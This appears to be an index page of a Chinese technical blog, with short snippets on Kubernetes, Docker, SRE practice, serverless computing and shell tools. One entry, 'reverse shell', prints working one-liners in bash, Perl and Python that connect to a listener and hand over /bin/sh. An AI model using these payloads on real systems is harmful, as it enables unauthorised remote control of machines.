索引 ANDROID ANGULAR BOOTSTRAP C# C/C++ CASSANDRA CHROME CLOJURE COUCHDB D DAPPER DEVOPS DOCKER ERLANG FIREFOX GIT GO HADOOP HASKELL HTML5 IOS JAVA JAVASCRIPT LINUX LISP LUA MARKDOWN MATH MEMCACHED MONGODB MYSQL NGINX NODE.JS OPENGL OPENSTACK PERL PHP POSTGRESQL PUPPET PYTHON R RASPBERRY PI REDIS REGEX RUBY RUST SCALA SHELL SPARK STORM SWIFT VARNISH VIM WEB前端 WEB安全 WOLFRAM 开源系

PyWren

PyWren是一个基于AWS Lambda的Python计算框架,模拟了Python futures包的map/reduce功能,非常适用于机器

Python __file__ not defined problem

file仅在文件中运行的时候才正常,而在交互式命令行中则需要使用变通的方法: import os import inspect import sys if not hasattr(sys.modules[__name__], '__file__'): __file__ = inspect.getfile(inspect.currentframe()) print os.path.dirname(os.path.abspath(__file__))

Raft

Raft Raft可以在高效的解决分布式系统中各个节点日志内容一致性问题的同时,也使得集群具备一定的容错能力。即使集群中出现部分节点故障、网络故障等

Redhat Atomic Host

Introduction Red Hat has announced first public beta of Red Hat Enterprise Linux 7 Atomic Host. The beta is available from Red Hat and on Amazon Web Services and Google Compute Platform. What can you expect from the Red Hat Enterprise Linux 7 Atomic Host Beta? Specifically Designed to Run Containers Red Hat Enterprise Linux 7 Atomic Host Beta provides a streamlined host platform that is optimized to run application containers.

SELinux

SELinux (Security-Enhanced Linux) 是一种强制访问控制(mandatory access control)的实现。它的作法是以最小权限原则(principle of least privilege)为

SRE指导思想

拥抱风险 SRE旨在平衡快速创新和高效服务运营之间的风险,而不是简单的最大化服务在线时间。 管理服务可用性主要在于管理风险,而且管理风险的成本可

SRE管理

培训新人 加入on-call 小型项目工作 文档修改 灾难演习 反向工程、随机应变 事后总结 更改真实环境并修复它

Seccomp

Seccomp是Secure computing mode的缩写,它是Linux内核提供的一个操作,用于限制一个进程可以执行的系统调用.Seccomp需要有一个

Serverless平台

AWS Lambda AWS Lambda是目前最有影响力的serverless产品,它依据事件响应触发用户自定义的Lambda函数,并自动管理后端的服务器、高可用

Serverless开源框架

常见的Serverless开源框架简介。 基于Kuberetes的Serverless框架 Fission Funktion: 通过fabric8-maven-plugin生成

Serverless案例

Web应用和后端 大数据处理 实时流数据处理

Setting up GRE for Kubernetes

首先修改Docker的默认网桥: #停止Docker Daemon进程 systemctl stop docker #设置默认网桥docker0为down,并删除 ip link set dev docker0 down brctl delbr docker0 #新

Something about kubernetes authentication

You can enable kubernetes authentication by through this documentation. Then you happily access kube-apiserve by curl: # curl -k -N -X GET -H "Authorization: Basic XXXXXXXXXX" http://localhost:8080/api/v1/namespaces/default/pods { "kind": "PodList", "apiVersion": "v1", "metadata": { "selfLink": "/api/v1/namespaces/default/pods", "resourceVersion": "74034" }, "items": [] } Nothing blocks this request! What is wrong? Wait a moment and checkout kubernetes documentation, I find this: The Kubernetes API is served by the Kubernetes apiserver process.

Stateless Floating IPs

Neutron里面的Floating IPs目前是基于iptables NAT来实现的,它使用ip_conntrack来跟踪所有连接(五元组),

TiDB

TiDB是 PingCAP 公司基于 Google Spanner / F1 论文实现的开源分布式 NewSQL 数据库。 TiDB 具备如下 NewSQL 核心特性: SQL支持 (TiDB 是 MySQL 兼容的) 水平线性弹性扩展 分布式事务 跨

Use kubectl to connect kubernetes cluster

kubectl is the main tool to interact with Kubernetes cluster. It connects to http://localhost:8080 with no auth by default. But how can we use kubectl with auth? Pretty simple, just config kubectl with dedicated cluster: kubectl config set-credentials default --username=username --password=password kubectl config set-cluster default --server=https://kubernetes-master:6443 --insecure-skip-tls-verify=true kubectl config set-context default --cluster=default --user=default kubectl config use-context default

Using cAdvisor to monitor docker

cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers. Specifically, for each container it keeps resource isolation parameters, historical resource usage, histograms of complete historical resource usage and network statistics. This data is exported by container and machine-wide. cAdvisor has native support for Docker containers and should support just about any other container type out of the box.

Weekly reading list (20150607)

OpenStack Magnum http://www.csdn.net/article/2015-06-02/2824827 Magnum是去年巴黎峰会后开始的一个新项目,专门用来向用户提供容器服务,其最新的架构如图2所示。从去年11月份开始在StackFor

Weekly reading list (20150626)

这周最热的就是Dockercon了,列表里面很多都是docker相关的。 Open Container Project (OCP) Today we’re pleased to announce that CoreOS, Docker, and a large group of industry leaders are working together on a standard container format through the formation

Zookeeper

awesome quick start

awesome是Linux平台出色的窗口管理器,具有速度快、界面简捷等优点。其安装也比较简单: sudo apt-get install -y awesome awesome-extra gnome-settings-daemon nautilus sudo apt-get install -y --no-install-recommends gnome-session mkdir -p ~/.config/awesome 常用快捷键整

awk examples

precede each line by line number awk '{print NR, $0}' filename replace first field by line number awk '{$1=NR; print}' filename print field 1 and field 2 awk '{print $1,$2}' fielname print last field awk '{print $NF}' filename print non empty lines awk 'NF>0{print $0}' filename print if more than 4 fields awk 'NF>4{print $0}' filename print matching lines (egrep) awk '/test.

bigdata

Awesome Big Data A curated list of awesome big data frameworks, resources and other awesomeness. Inspired by awesome-php, awesome-python, awesome-ruby, hadoopecosystemtable & big-data. Your contributions are always welcome! Awesome Big Data Frameworks Distributed Programming Distributed Filesystem Key-Map Data Model Document Data Model Key-value Data Model Graph Data Model NewSQL Databases Columnar Databases Time-Series Databases SQL-like processing Integrated Development Environments Data Ingestion Service Programming Scheduling Machine Learning Benchmarking Security System Deployment Applications Search engine and framework MySQL forks and evolutions PostgreSQL forks and evolutions Memcached forks and evolutions Embedded Databases Business Intelligence Data Visualization Internet of things and sensor data Interesting Readings Interesting Papers Other Awesome Lists Frameworks Apache Hadoop - framework for distributed processing.

cannot change locale

运行locale命令 LANG= LANGUAGE= LC_CTYPE=“POSIX” LC_NUMERIC=“POSIX” LC_TIME=“POSIX” LC_COLLATE=“POSIX” LC_MONETARY=“POSIX” LC_MESSAGES=“POSIX” LC_PAPER=“POSIX” LC_NAME=“POSIX” LC_ADDRESS=“POSIX” LC_TELEPHONE=“POSIX” LC_MEASUREMENT=“POSIX” LC_IDENTIFICATION=“POSIX” LC_ALL= 修改profile vi /etc/profile 添加如下内容 export LC_ALL=en_US.UTF-8 source /etc/profile 得到错误 setlocale: LC_ALL: cannot change locale (en_US.UTF-8): No such file or directory  运行 dpkg-reconfigure

cri-o

cri-o cri-o基于Kubelet容器运行时接口(CRI)为Kubernetes带来了原生的OCI运行时(目前仅支持runc)。cri-o还在紧

docker in tencent

腾讯内部对Docker有着广泛的使用,其基于Yarn的代号为Gaia的调度平台可以同时兼容Docker和非Docker类型的应用,并提供高并

docker internal

docker-baseAbstract 本文在现有文档的基础上总结了以下几点内容 docker的介绍,包括由来、适用场景等 docker背后的一系列技术 - namespace, cgroup, lxc, aufs等 docker

docker networking

见CNM (Container Networking Model)。

gPRC

gPRC是基于HTTP/2的开源高性能PRC框架,它基于Protocol Buffer序列化协议,并支持Java、Go、C++、Python、

git commit修改前一次提交的方法

方法一:用–amend选项 #修改需要修改的地方。 git add . git commit –amend 注:这种方式可以比较方便的保持原有的Change-Id,推荐使用。 方法

nas

NAS NAS(Network-Attached Storage,网络附加存储)是指连接到计算机网络的文件级别计算机数据存储,可以为不同客户端提供数

net-ns

简介 在Linux协议栈中引入网络命名空间,是为了支持网络协议栈的多个实例,而这些协议栈的隔离就是由命名空间来实现的(有点像进程的线性地址空间

on-call轮值

on-call轮值是运维团队的重要职责,目标是保障服务的可靠性和可用性。 on-call工作平衡 数量平衡:至少50%时间花在软件工程上,其余时

perf

简介 perf是Linux内核自带的性能分析工具。通过它,应用程序可以利用 PMU,tracepoint 和内核中的特殊计数器来进行性能统计。它不

reverse shell

Listen for 8080 first nc -l -p 8080 -vvv Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i & /dev/tcp/10.0.0.1/8080 0&1 PERL Here’s a shorter, feature-free version of the perl-reverse-shell: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&S");open(STDOUT,"&S");open(STDERR,"&S");exec("/bin/sh -i");};' There’s also an alternative PERL revere shell here. Python This was tested under Linux / Python 2.7: python -c 'import socket,subprocess,os;s=socket.

runV

runV 是Open Container Initiative (OCI) 标准 的一个实现(其他实现包括runc和clear container等)。与runc不同的是,runV是一个基于虚拟化的OC

runc

runc 是Open Container Initiative (OCI) 标准 的一个实现(其他实现包括runv和clear container等),也是Docker管理容器的默认后端实现。 OCI标准

screen tips

简介 Screen是一个可以在多个进程之间多路复用一个物理终端的窗口管理器。Screen中有会话的概念,用户可以在一个screen会话中创建多

spanner

Spanner是Google提供的跨区域/跨数据中心的关系型分布式数据库,在满足事务一致性的同时还具备极强的可扩展性,结合了传统关系数据库和

sysdig

Sysdig captures system calls and other system level events using a linux kernel facility called tracepoints, providing a rich set of real-time, system-level information. Sysdig “packetizes” this information, so that you can do things like save it into trace files and easily filter it, a bit like you would do with tcpdump. This makes it very flexible to explore what processes are doing. Sysdig instruments your physical and virtual machines at the OS level by installing into the Linux kernel and capturing system calls and other OS events.

systemtap

SystemTap是DTrace的Linux实现,它把用户提供的脚本转换为内核模块来执行,用来监测和跟踪内核事件。 安装 注意,较新的内核不支持

vagrant

简易虚拟机管理工具vagrant Vagrant简介 Vagrant是一款跨平台的虚拟机管理工具,可以用来封装跨平台的开发环境,分发给团队成员共

一致性

一致性的解决方法: 排他锁:性能较差 读写锁:读可以并发,但写的时候不能读,读的时候不能写 Copy on write:读写互不影响,效率较高。如果一个人在事

云原生框架

API Google API Design Guide OpenAPI Swagger KONG Tyk gRPC - A high performance, open source, general-purpose RPC framework Finagle - A fault tolerant, protocol-agnostic RPC system 文档 Google Developer Documentation Style Guide OpenAPI GitBook Daux.io

京东容器集群建设之路

从0诞生 2013年初,京东商城研发布局虚拟化技术方向。那时的我们从0起步。从几人小团队开始起航。 在物理机时代,应用上线等待分配物理机时间平均

使用Mesos来管理Docker集群

Introduction Apache Mesos能够在同样的集群机器上运行多种分布式系统类型,更加动态有效率低共享资源。提供失败侦测,任务发布,任务跟踪,任务监控,低层次资源

分布式共识提高可靠性

CAP理论指出在分布式系统中,最多只能满足以下三条中的两个: 数据一致性(C),等同于所有节点访问同一份最新的数据副本; 对数据更新具备高可用性

分布式定时任务

定时任务的目标是在指定的时间或间隔来周期性启动任务。在Linux系统上,经常用crontab来管理定时任务。 定时任务与幂等性 定时任务周期性执

可用性和扩展性

可靠发布

发布协调工程师 审核新产品和内部服务,确保符合可靠性标准和最佳实践 负责发布过程中的所有技术相关问题,发布过程的“守门人” 培训开发者最佳实践 建立

好书推荐

推荐最多的书籍 技术书籍 黑客与画家:来自计算机时代的高见 数学之美 多处理器编程的艺术(修订版) 高性能MySQL(第3版) Go Web编程 MacTal

容器资源列表

Awesome Docker Awesome Kubernetes Kubernetes Handbook 调度编排 Kubernetes Mesosphere DC/OS SwarmKit Tectonic Rancher Platform9 Kitmatic Deis OpenShift 镜像管理 DockerHub Quay

常用 Windows 10 快捷键

Windows Key + Ctrl + D:创建一个新的虚拟桌面 Windows Key + Ctrl + 左右方向:切换虚拟桌面 Windows Key + Ctrl + F4:关闭虚拟桌面 三指下滑(Windows Key + D或M)最小化所有

故障排查

故障排查可以定义为一个反复“假设-排除”的过程: 常见陷阱 关注了错误的系统现象 不能正确的修改系统配置活着运行环境 过早将任务归结为极不可能的因素

数据处理流水线

数据处理流水线(Data Processing Pipeline)与UNIX管道类似,程序读取输入、处理、最后输出新的数据,多个程序串联起来执行就构成了流水线。串

数据完整性

数据完整性(data integrity)意味着服务可用性和数据可访问性,二者缺一不可。 数据丢失故障 造成数据丢失的事故可以分类为三个因子的24

架构即未来

架构即未来笔记 讲师:陈斌 易宝支付有限公司CTO 互联网企业要成功,除了在业务模式上要有优势以外,也需要在技术管理方面形成不断向上的良性循环。这

测试

测试是证明变更前后系统的某些领域相等性的手段,测试的数量直接取决于系统的可靠性要求。 软件测试可以分为传统测试和生产测试两大类,传统测试用来在

消息队列

监控与告警

监控一个大规模的系统是一个非常有挑战的事情,组件多,分析繁杂,而又要求监控系统本身的维护非常低。在大规模系统部署下,任何一个单机问题的报警都

网络分区

负载均衡

负载均衡一般包括几个不同层面,分级多次进行: 全球负载均衡系统(GSLB): 基于地理位置负载均衡DNS 用户服务层面负载均衡 RPC负载均衡 DNS

避免连锁故障

连锁故障是由于正反馈循环导致的不断扩大规模的故障,也称为雪崩效应。 故障原因 服务器过载,集群故障时负载均衡或者编排系统会加剧过载进程 资源耗尽 C

阿里云RDS

阿里云RDS 但是那些 RDS 用户的数据量也是在持续增长的,对于云服务提供商来说不能眼睁睁的看着这些 RDS 用户数据量一大就走掉或者自己维护数据库集群。因

附录

可用性时间表 可用性 年 月 日 小时 90% 36.5d 3d 2.4h 6min 95% 18.25d 4.5d 1.2h 3min 99% 3.65d 7.2h 14.4min 36s 99.9% 8.76h 43.2min 1.44min 3.6s 99.99% 52.6min 4.32min 8.64s 0.36s 99.999% 5.26min 25.9s 0.87s 0.04s